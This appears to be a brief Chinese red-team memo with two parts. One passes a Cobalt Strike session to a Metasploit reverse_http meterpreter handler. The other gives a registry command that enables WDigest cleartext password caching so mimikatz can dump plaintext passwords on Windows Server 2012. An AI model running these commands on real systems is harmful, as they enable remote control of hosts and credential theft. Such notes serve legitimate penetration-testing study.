一:cs与msf权限传递
1.创建Foreign监听器;
2.MSF监听模块设置对应地址端口;
use exploit/multi/hander
set payload windows/meterpreter/reverse_http
set lport 4444
exploit
3.cs执行新建会话选择创建的监听器;
验证:
二.mimikatz抓取win2012明文密码:
修改注册表的来保存明文:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
修改注册表之后,注销用户(强制锁屏进行注销),重新登录才能抓取到明文
抓取的明文: